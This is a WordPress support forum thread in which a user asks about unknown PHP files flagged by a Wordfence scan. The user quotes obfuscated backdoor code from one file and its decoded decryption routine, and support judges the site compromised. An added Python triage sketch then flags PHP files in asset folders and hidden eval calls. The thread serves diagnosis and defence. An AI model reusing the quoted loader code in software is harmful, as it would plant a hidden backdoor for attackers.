• Resolved zeno001

    (@zeno001)


    Wordfence updated to 6.3.10 automatically this afternoon and now getting the following warnings (in high sensitivity mode):

    Unknown file in WordPress core: wp-includes/js/class-https.php
    Unknown file in WordPress core: wp-includes/https.php
    Unknown file in WordPress core: wp-admin/js/edit-form-header.php
    Unknown file in WordPress core: wp-admin/css/formcheck.php
    Unknown file in WordPress core: wp-admin/css/widget.php

    They all have last modification dates of 2010 to 2014.

    Are these related to the Wordfence update?

    Thanks.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Hi @zeno001,

    Are these issues that you previously ignored?

    If so, the situation is most likely related to the fix we implemented in this latest version (6.3.10).

    From this version onward, the Scan summary box will say “Ignored” for previously ignored issues instead of saying “Problems found” as it used to.

    At first, you will experience the following situation:

    • The old ignored issues will stay in the “Ignored Issues” tab.
    • New issues will appear in “New issues” for those same issues. They will appear to be duplicates of the old ignored issues.

    Once those “new issues” are ignored, the new behavior will be in effect.

    Thread Starter zeno001

    (@zeno001)

    Thanks, wfyann. I can’t be absolutely sure, but I don’t think I had previously ignored them. The new behaviour sounds like it makes more sense!

    Thanks.

    @zeno001,

    Are these issues still reported when High Sensitivity is disabled?

    Have you recently (re)enabled the “Scan wp-admin and wp-includes for files not bundled with WordPress” option?

    Thread Starter zeno001

    (@zeno001)

    Just disabled high sensitivity and ran a new scan: the same files were reported.

    I’m not sure when I enabled that option, but it certainly wasn’t in the past week or so.

    Do you know what these files are? Are they (or were they) core WP files?

    Just had a look at the first file – although it looks mostly OK and is commented, there is this in the middle:

    function add_registered_taxonomy() {
    global $transl_dictionary;
    $transl_dictionary = create_function('$inp,$key',"\44\163\151\144\40\75\40\44\137\120 ….. [a long line]
    if (!function_exists("O01100llO")) {
    function O01100llO(){global $transl_dictionary;return call_user_func($transl_dictionary,'fqOf%7bI%26%26fO … [a long line]
    call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));
    }
    }

    The long lines of encoded HTML entities decode to this:

    $sid = $_POST [“sid”]; if (md5($sid) !== ‘0eee3ac0553c3c1376fa2010d8e764f5’ ) return ‘print “<!DOCTYPE HTML PUBLIC \”-//IETF//DTD HTML 2.0//EN\”><HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this folder.<HR><ADDRESS>Click here to go to the home page</ADDRESS></BODY></HTML>”;’; $sid= crc32($sid) + $key; $inp = urldecode ($inp); $t = ”; $S =’!#$%&()*+,-./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_\'"abcdefghijklmnopqrstuvwxyz{|}~f^jAE]okI\'OzU[2&q1{3h5w_79″4p@6\s8?BgP>dFV=mD<TcS%Ze|r:lGK/uCy.Jx)HiQ! #$~(;Lt-R}Ma,NvW+Ynb*0X’; for ($i=0; $i<strlen($inp); $i++){ $c = substr($inp,$i,1); $n = strpos($S,$c,95)-95; $r = abs(fmod($sid+$i,95)); $r = $n-$r; if ($r<0) $r = $r+95; $c = substr($S, $r, 1); $t .= $c; } return $t;

    To my untrained eye, this looks dodgy!

    Any ideas?

    Hi @zeno001,

    Sorry about the delayed response.

    After discussing this topic with my colleagues, we believe your site might’ve been compromised.

    Some of the code you shared does look like malware and the presence of a PHP file in a folder that should only have JavaScript (Unknown file in WordPress core: wp-admin/js/edit-form-header.php) is in itself suspicious.

    I strongly recommend you follow the steps outlined in our documentation.
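
Added example (not part of the thread and not Wordfence's code): a triage sketch for the two signals discussed above, a `.php` file sitting in a directory meant for JS/CSS and calls such as `eval(` that only appear once PHP's octal/hex string escapes are expanded. The names `ASSET_DIRS`, `decode_php_escapes` and `triage` are hypothetical, and treating `wp-admin/js` and `wp-admin/css` as PHP-free is an assumption taken from the posts.

```python
import re
from pathlib import PurePosixPath

# Assumption: these core directories hold only static assets, so any .php
# file below them is worth a look (paths are relative to the WordPress root).
ASSET_DIRS = ("wp-admin/js", "wp-admin/css")
# Calls seen in the snippet quoted in this thread.
TOKENS = ("eval(", "create_function", "call_user_func")
# PHP double-quoted string escapes: \xHH (1-2 hex digits) and \NNN (1-3 octal).
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(text):
    """Expand hex/octal escapes the way PHP does inside double quotes."""
    def expand(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values to one byte
    return ESCAPE.sub(expand, text)


def triage(path, source):
    """Return a list of reasons this file deserves manual review."""
    findings = []
    p = PurePosixPath(path)
    parent = str(p.parent)
    if p.suffix.lower() == ".php" and any(
        parent == d or parent.startswith(d + "/") for d in ASSET_DIRS
    ):
        findings.append("php-in-asset-dir")
    decoded = decode_php_escapes(source)  # applied to the whole file text
    for token in TOKENS:
        if token in source:
            findings.append("plain:" + token)
        elif token in decoded:
            findings.append("hidden:" + token)  # only visible after decoding
    return findings


# Constructed sample: the two escaped strings from the thread, with the
# first one cut where the post elides it.
SAMPLE = r'''$transl_dictionary = create_function('$inp,$key',"\44\163\151\144\40\75\40\44\137\120");
call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));'''

if __name__ == "__main__":
    print(decode_php_escapes(SAMPLE))
    print(triage("wp-admin/js/edit-form-header.php", SAMPLE))
```

A hit is a reason to compare the file against a clean copy of the same WordPress release, not a verdict on its own.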

    Thread Starter zeno001

    (@zeno001)

    wfyann

    Thanks. I’ll follow that procedure – or I may just wipe all the WP files and re-install (retaining the current database).

    But if those files shouldn’t even be there (and I can see those directories are for js or css files, not php), can I just delete them rather than removing the rogue code? The only file that’s not obviously out of place is https.php in the wp-includes directory (and there is a http.php file already there).

    Actually, thinking about it, it was a very small site anyway so I’ll just delete all the files and database and install from scratch and recreate it – it’ll be worth the effort.

    Thanks for all your help.

  • The topic ‘Unknown files after Wordfence update to 6.3.10’ is closed to new replies.